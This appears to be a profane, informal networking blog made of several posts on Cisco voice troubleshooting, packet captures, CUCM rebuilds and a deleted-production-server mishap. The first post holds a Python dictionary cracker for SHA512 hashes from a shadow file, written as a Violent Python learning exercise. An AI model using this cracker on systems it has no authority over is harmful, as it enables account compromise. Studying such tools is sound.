Uncategorized

Violent Python

I’m going through a book called Violent Python, and the first program is building a password cracker. The example is great, but uses the crypt module, and DES for the example – this is a bit out of date. The author suggests trying to adapt the program for SHA512, which is used on many modern *nix systems.

So, I came up with this rudimentary program to crack SHA512 hashed passwords with 5k rounds from my /etc/shadow file. There are, of course, MUCH better ways to crack passwords, but hopefully this will be helpful to someone else going through this book.

 


#!/usr/bin/python
# -*- coding: utf-8 -*-
import crypt
from passlib.hash import sha512_crypt

def testPass(cryptPass, saltySalt):
    dictFile = open('dictionary.txt', 'r')
    for word in dictFile.readlines():
        word = word.strip('\n')
        cryptWord = sha512_crypt.hash(word, salt=saltySalt, rounds=5000)
        if cryptWord == cryptPass:
            print '[+] Found Password: ' + word + '\n'
            return
    print '[-] Password Not Found.\n'
    return


def main():
    passFile = open('shadow.txt')
    for line in passFile.readlines():
        if '$' in line:
            user = line.split(':')[0]
            cryptPass = line.split(':')[1]
            saltySalt = line.split('$')[2]
            print '[*] Cracking Password For: ' + user
            testPass(cryptPass, saltySalt)


if __name__ == '__main__':
    main()

Ok, so now that we’ve got this bad boy installed, a new password set, and licensing taken care of, it’s time to start configuring!

The first thing we need to do is to define an IP address for management access, so from within the vSphere console window we do:

>enable

#configure terminal

(configure)#bootparam

Then, it will go a little like this:

 

Screen Shot 2015-06-26 at 12.02.34 PM

Now, we will need to save and activate this before you start getting all web-browser giddy and ditch the CLI for all those happy GUI times ahead.

So, let’s do that:

(configure)#exit

#save-config

#activate-config

Sweet! Now we can get all visual and stuff. Browse to your IP address, and login with ‘admin’ and your newly created enable password. Click around a bit – enjoy it. then RTFM, and join us in the next post where we start really configuring shit.

 

Did you think I was done busting caps after that last post? Really? You must not have know that I’m an O.G.

Sometimes it’s not enough to be busting caps on the IP encapsulated stuff. Sometimes you need to pull a PCM trace from the router or VG224.

Cisco makes it easy for you if you’re using an ISR G2 router – or a VG350, but if you have to do it on a VG224 – it’s not so straight-forward. The commands to get the PCM.dat file are really no big deal. Capturing on port 2/0 looks like this:

conf t
voice hpi capture destination flash:pcm.dat
voice hpi capture buffer 5000000
exit

test voice port 2/0 pcm-dump caplog 7

test voice port 2/0 pcm-dump disable

dir
Directory of slot0:/

1  -rw-    21237908  Feb 28 2002 19:06:04 -05:00  vg224-i6s-mz.124-22.T5.bin
2  -rw-    28900564  Feb 28 2002 19:22:52 -05:00  vg224-i6k9s-mz.151-4.M6.bin
3  -rw-     4954752   Aug 2 1993 12:31:10 -05:00  pcm.dat

64012288 bytes total (8912896 bytes free)
copy pcm.dat tftp
Address or name of remote host []? 10.98.1.198
Destination filename [pcm.dat]?
!!!!!!!!!!!!!!!!!!!!!
4954752 bytes copied in 43.960 secs (112710 bytes/sec)

 

The tricky part is that you need to decode this file to listen to it, and it’s a cisco-only “Packet Capture Extraction Tool” that TAC uses to do this. Fuckers.

If anybody out there reading this can help an O.G. figure out how to do this on your own – please hit me up with a comment!

Sometimes I bust so many caps I feel like I’m Woka Flokca:

Today I had to bust a cap on an Acme Packet 3820. We had been having a strange, intermittent one-way audio problem plaguing us for some time. All the SIP traces had looked good on the call examples, and we were unable to re-produce the issue. So, time went on, and once in awhile we would hear about another one. Always from the same guy, and always a wireless caller calling in from the PSTN to him.

This is one of the most frustrating things in IT. Intermittent problems with no real pattern that you cannot re-produce. Well, we had our breakthrough a couple of days ago. We had a few more people reporting problems, and found a pattern to it. It was happening only to the people who had mobility (Single Number Reach) enabled on their phones. We were able to re-produce it with the client, so I set up a test phone to mirror their configuration, and sure enough, I could re-produce it on my test phone, too. Jackpot!

So, I started to look at the traces. It was quite the call flow between 4 pairs of SBC’s, a CUCM SME cluster, a Siemens OSV, and a CUCM Leaf cluster. SIP messaging was bouncing around like hollow points ricocheting.

We were able to simplify it a little bit – get it down to 2 SBC pairs, take the OSV out of the call flow, and modify the route group so at least we could chose the SBC pair for the outbound call to the remote destination.

After doing this, and making several test calls, it was still very hit or miss. One in 4 or so would fail, with no real pattern to it. All the signaling looked good when scrutinizing the SDP. So what next?

I did what any good little UC engineer would do, and started busting caps. First, I put the 6945 I was using for testing on to a switch I had hanging out with me, and did a little monitor-session config:

First – filter those nasty BPDU’s from your uplink port so you don’t put the port on switch in the closet into an errdisable state:

interface FastEthernet0/48
switchport mode access
power inline never
spanning-tree bpdufilter enable

Then, pick your nose, and the ports that you want to use:

no monitor session 1
monitor session 1 source interface FastEthernet 0/1 both
monitor session 1 destination interface Fa0/2

Now, it was time to shark my wire, and what did I see? RTP in both directions:

Screen Shot 2015-04-25 at 6.44.08 PM

Digging into the details – those little UDP packets were headed for the right port on the SBC, so it was time to capture on the other side.

Here’s what I did to send a copy of all the packets in/out of the SBC to my laptop:

3820_HOSTNAME# configure terminal
3820_HOSTNAME(configure)# system
3820_HOSTNAME(system)# capture-receiver
3820_HOSTNAME(capture-receiver)# state enabled
3820_HOSTNAME(capture-receiver)# address 10.98.1.198
3820_HOSTNAME(capture-receiver)# network-interface s1p0:0
3820_HOSTNAME(capture-receiver)# exit
Save Changes [y/n]?: y
capture-receiver
state enabled
address 10.98.1.198
network-interface s1p0:0
last-modified-by admin@10.98.1.198
last-modified-date 2015-04-25 18:57:06

3820_HOSTNAME(system)# exit
3820_HOSTNAME(configure)# exit
3820_HOSTNAME# save-config
checking configuration
Save-Config received, processing.
waiting for request to finish
Request to ‘SAVE-CONFIG’ has Finished,
Save complete
Currently active and saved configurations do not match!
To sync & activate, run ‘activate-config’ or ‘reboot activate’.
3820_HOSTNAME# activate-config
Activate-Config received, processing.
waiting for request to finish
Request to ‘ACTIVATE-CONFIG’ has Finished,
Activate Complete
3820_HOSTNAME# packet-trace remote start s1p0 10.98.61.45

Trace started for 10.98.61.45
3820_HOSTNAME# packet-trace remote start s0p0 192.168.205.12

Trace started for 192.168.205.12
3820_HOSTNAME#

 

 

So I was recently tasked with building out a UAT (user acceptance testing) environment for a customer. This is basically an exact replica of the production environment we have just spent 2 years designing and implementing.  This allows the customer to test any upgrades, changes, or patches before actually implementing them into production.  Plus its pretty cool if you are doing some dicey shit and wanna make sure you don’t bring the entire enterprise to its knees in the middle of the day.

Now to the problem.  30% or so of the UAT environment was already built out using a SU 1 version of call manager.  Now you may say “who fucking cares”?  Well guess what, I do.  Cisco doesn’t publish a bootable version of the SU 1 version of call manager.  Now when you are adding new subscribers to an existing publisher, the versions of call manager have to be exactly the same, or the new subscribers will shit all over themselves.  So we came up with the brilliant idea to switch versions on all the UAT servers that were currently up and running.  (I have a bootable ISO for this version).  Once I got all the existing servers back to the old version, I could install all the new servers, do a switch version at the CLI of the existing servers, and then do a simple upgrade on all the new servers to the SU 1 version of Call Manager.  Sounds easy right?  Well it is pretty fucking easy, the only problem is it doesn’t fucking work.  I got the entire environment built out, ran the switch version commands, then set off the upgrades.  Came back and hour later to find all 20 or so of my new servers had failed the upgrade process.

So back to square one.  I deleted all those new servers.  So started noodling this shit some more.  Now I am sure we have all seen this screen when building out a new environment.

007-no-patch

 

If you are like me, you typically just tab right through this shit.  But hey, this sounds like my scenario right?  I have existing servers running a SU 1 version.  I am installing new subscribers and I am lacking the bootable ISO.  So why not install the bootable version, then press yes on this screen and apply the upgrade at the end.  So again this sounds easy right?  Fuckin ehh its easy. Now here is the issue.  I am building 25 servers, there is no fucking way I am doing this without answer files.  I could not for the life of me find a way to apply this upgrade patch, and use answer files at the same time.  So i said fuck it, I will build one by hand without using the answer files and just see if it works.  Guess what, that shit still failed.  I was all out of ideas here.  Did i mention I only had 4 days to build out and fully test this giant UAT environment.  I had just spend 1 and a half of those 4 days fucking around with this stupid shit.

Now if you scroll down a few blog posts and see the post entitled http://www.backdoorburglar.com/?p=144….you will see that we had a major issue with deleting a few production servers ( no big deal right)….haha this was actually a huge fucking deal, but that’s an entirely different matter.  The reason I am bringing this up is because during the huge debacle, we actually got Cisco TAC to confirm that you should not apply an upgrade patch during the install ( then why the fuck is that even on the install page?).  This also prompted them to give us the bootable ISO of this SU 1 version of Call Manager that I was sorely in need of.  So I went back and deleted all the new servers I had built (AGAIN) and rebuilt them using that bootable ISO.  Now you may be thinking to yourself “what a lazy fucker, why didn’t he troubleshoot the issue of the failed upgrades instead of being a big vagina and taking the easy way out using the bootable ISO?”  To that I say “fuck you” I  was trying to cram 10 lbs of shit into a 5lb bag by trying to build out this ginormous environment in 4 days.  I had already spent 1.5 days getting absolutely nowhere.  Sometimes you gotta know when to hold em and know when to fold em.

Busting a Cap

Debugging is part of life as an engineer. If I had a dollar for every time I double and triple checked my configuration to confirm, then got to the point where it was time to run debugs, I would be a rich motherfucker.

Debugging on IOS is pretty damn good. I applaud Cisco for how well they build these sort of features into their products, not to mention how well documented they are. But, as Mick Jagger once said, “You can’t always get what you want”.

That’s what happened today when I started looking into a problem getting T38 to work with the following call flow: Verizon SIP trunk –> Acme Packet 3820 –> CUCM SME –> CUCM Leaf –>  MGCP connected VG224

We see the re-invite for T38 version 0 sent to Verizon, and they send us a 200 OK with SDP indicating T38 version 0 as well. The call stays up for 32 seconds, and then we hang up and send Verizon a BYE.

All the debugs looked good, so it was time to start capturing packets. In this environment, it’s pretty difficult to get a network engineer to do a port span – so we chose to capture packets on the VG224.

Here’s the config we used to do this:

conf t
logging monitor
exit
term mon
debug vpm signal

monitor capture buffer holdpackets
monitor capture point ip cef t38trace FastEthernet 0/0 both
monitor capture point associate t38trace holdpackets
monitor capture point start t38trace

monitor capture point stop t38trace
monitor capture buffer holdpackets export tftp://10.98.1.198/t38capture.pcap
no monitor capture point ip cef t38trace FastEthernet 0/0 both
no monitor capture buffer holdpackets

 

If you want to read more about capturing packets in IOS – check out this Link.

 

Clusterfuck

Have you ever fucked up so bad that it’s pitchfork in the ass bad?

Pitchfork

Everybody has those day to day fuckups. Stuff you learn from and say, “Oh, silly me – I should pay closer attention. How did I ever leave my keys in the refrigerator?”

Shit like that is kinda funny, and you think about it next time you come home and decide to hang them on the hook that is dedicated to this function – instead of chilling them like a hooker or a penguin (which are ironically the only two things that never really get cold – google it).

Then there are the big ones – and they’re usually stupid mistakes with no real excuse. The kind of stuff that happens when you get in a hurry, and have a momentary lapse of reason on something really, really important. These are the ones that cause the defecation to hit the rotary oscillator in a triumphant manner.

One of my favorite feature of modern web browsers is tabs. I always organize my tabs from left to right. Mine go like this: SME, Leaf1, Leaf2, CUC, SBC1, SBC2….

It’s a good strategy when working in a complex environment with lots of clusters. Your mileage may vary – but this scheme works for me.

Yesterday afternoon I was on fire. We were blowing out a couple of clusters and re-building them. We had answer files, OVA’s, some fresh 420 (UCS-C420’s, hippie – what were you thinking?). When you add these together you can fire off 10 different windows at once and just watch all those babies come to life. Stop for a minute to migrate 8 sites to a new set of SBC’s, then – Oops – well, it looks like we added a few servers under System -> Server that won’t actually be added to the cluster for a few more days. I remembered someone once telling me that you shouldn’t leave servers configured in there if they’re not online, because you can end up with database corruption down the road that way.

So, I quickly deleted them. Fuck it – it’s a non-production cluster, right? Well, the CUCM tabs on the right are… OH SHIT! This is the tab on the LEFT!!!!

To be continued…

I don’t know about you, but I always appreciate a good tool. In fact, I’ve had many ex-girlfriends call me a total tool, and I always took that as a really great compliment! I mean, the use of tools is what separates us from the apes, right? (well, that and chromosome #2)

One guy who is a very evolved homo-sapien with a well-functioning prefrontal cortex is Mr. Burns.

burns

 

Ok, ok, no – not THAT Mr. Burns. I’m talking about the IT Superhero who runs BBBBlog.  I had the pleasure of working with him a few years ago when I was very new to Cisco UC. He’s one of those brilliant engineers that inspires you to learn more just to try to catch up to him, even though you probably never will. Now I stalk him on the interweb from time to time to learn new tricks.

One new trick I learned today is a splendid tool for doing core maps / UC VM placement. I thought I was doing a great job of this with a borrowed Excel spreadsheet that was nicely formatted for the purpose. Now, I know, that is the punk ass bitch way of doing it. Check out this TOOL